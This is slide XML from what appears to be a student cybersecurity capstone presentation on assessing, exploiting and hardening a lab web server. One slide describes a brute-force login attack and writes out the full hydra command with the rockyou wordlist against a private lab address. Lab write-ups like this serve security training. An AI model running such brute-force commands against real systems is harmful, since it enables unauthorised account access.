          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="0"/>
            <a:ext cx="9168120" cy="533520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="274320" tIns="182880" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>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166" name="Google Shape;39;p6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="640080"/>
            <a:ext cx="8595360" cy="972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
        <p:nvSpPr>
          <p:cNvPr id="167" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8607600" y="4957200"/>
            <a:ext cx="261720" cy="105120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="en" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{406F0825-FACF-4AB3-8D3B-FCCF9A9E1E45}" type="slidenum">
              <a:rPr b="0" lang="en" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168" name="Google Shape;41;p6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="4906440"/>
            <a:ext cx="8595360" cy="9720"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21600" y="21600"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="a9b7c0"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="Google Shape;44;p6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4936320" y="890280"/>
            <a:ext cx="2688120" cy="476280"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="365c8b"/>
          </a:solid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2100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
              </a:rPr>
              <a:t>System Hardening</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2100" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="170" name="Google Shape;45;p6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5072760" y="1279440"/>
            <a:ext cx="260640" cy="144360"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartExtract">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="365c8b"/>
          </a:solidFill>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="Google Shape;46;p6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="887760"/>
            <a:ext cx="2688120" cy="476280"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3d85c6"/>
          </a:solid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2100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Alarm</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2100" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="Google Shape;47;p6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="575640" y="1276920"/>
            <a:ext cx="226080" cy="144360"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartExtract">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3d85c6"/>
          </a:solidFill>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17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10" name="Google Shape;50;p7" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="0" t="2488" r="0" b="2499"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="275040"/>
            <a:ext cx="8595000" cy="4593240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="Google Shape;51;p7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8607600" y="4957200"/>
            <a:ext cx="261720" cy="105120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{72EDA35E-B7CB-4E05-BAD7-45E9FAA35F3C}" type="slidenum">
              <a:rPr b="0" lang="en" sz="600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212" name="Google Shape;52;p7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="4916520"/>
            <a:ext cx="7971480" cy="226440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="213" name="Google Shape;53;p7" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2048760" y="496080"/>
            <a:ext cx="5046480" cy="4150800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw algn="bl" blurRad="57240" dir="5400000" dist="19080" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2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21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image" Target="../media/image14.jpeg"/><Relationship Id="rId4"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jpe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png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.jpeg"/><Relationship Id="rId5"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jpeg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.jpeg"/><Relationship Id="rId4"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jpe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274320" y="1703880"/>
            <a:ext cx="8595000" cy="792000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Capstone Engagement</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1001"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="3100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Assessment, Analysis, </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3100"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en" sz="3100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>and Hardening of a Vulnerable System</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="4916520"/>
            <a:ext cx="7971480" cy="226440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="274320" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
              </a:rPr>
              <a:t>Frank Lin - Project 2 - Capstone Engagement</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="7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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="0"/>
            <a:ext cx="9168120" cy="533520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="274320" tIns="182880" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Exploitation: Brute Force Password Attack</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="332" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="4916520"/>
            <a:ext cx="7971480" cy="226440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="274320" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="333" name="Google Shape;1135;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="723600" y="1480680"/>
            <a:ext cx="2428200" cy="3153960"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16667"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="f3f3f3"/>
          </a:solidFill>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="334" name="Google Shape;1136;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724320" y="1480680"/>
            <a:ext cx="2371320" cy="3153960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="182880" rIns="182880" tIns="182880" bIns="182880" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools &amp; Processes</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>There was a secret folder on the </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>server that had a standard Authentication window pop up for web credentials. The page that it would access had a message that said “For ashtons eyes only,” which might indicate a login username. This simple login window may seemed susceptible to a brute force attack, so the program “hydra” was used. The password list rockyou.txt was used in the program with -s 80 (port), -f 192.168.1.105 (host), with a http-get request to the secret_folder.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="1" lang="en" sz="800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>hydra -l ashton -P /usr/share/wordlists/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="335" name="Google Shape;1137;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="887760"/>
            <a:ext cx="533160" cy="533520"/>
            <a:chOff x="457200" y="887760"/>
            <a:chExt cx="533160" cy="533520"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="336" name="Google Shape;1138;p63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="887760"/>
              <a:ext cx="533160" cy="476280"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="cc0000"/>
            </a:solid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2100" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Light"/>
                  <a:ea typeface="Roboto Light"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="2100" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="337" name="Google Shape;1139;p63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="593640" y="1276920"/>
              <a:ext cx="260640" cy="144360"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="cc0000"/>
            </a:solidFill>
            <a:ln w="0">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="338" name="Google Shape;1140;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228840" y="887760"/>
            <a:ext cx="533160" cy="533520"/>
            <a:chOff x="3228840" y="887760"/>
            <a:chExt cx="533160" cy="533520"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="339" name="Google Shape;1141;p63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3228840" y="887760"/>
              <a:ext cx="533160" cy="476280"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="cc0000"/>
            </a:solid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2100" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Light"/>
                  <a:ea typeface="Roboto Light"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="2100" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="340" name="Google Shape;1142;p63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="3365640" y="1276920"/>
              <a:ext cx="260640" cy="144360"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="cc0000"/>
            </a:solidFill>
            <a:ln w="0">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="341" name="Google Shape;1143;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3495240" y="1480680"/>
            <a:ext cx="5333400" cy="1737720"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16667"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="f3f3f3"/>
          </a:solidFill>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="342" name="Google Shape;1144;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3495960" y="1480680"/>
            <a:ext cx="5333400" cy="1737720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="182880" rIns="182880" tIns="182880" bIns="182880" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Achievements</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
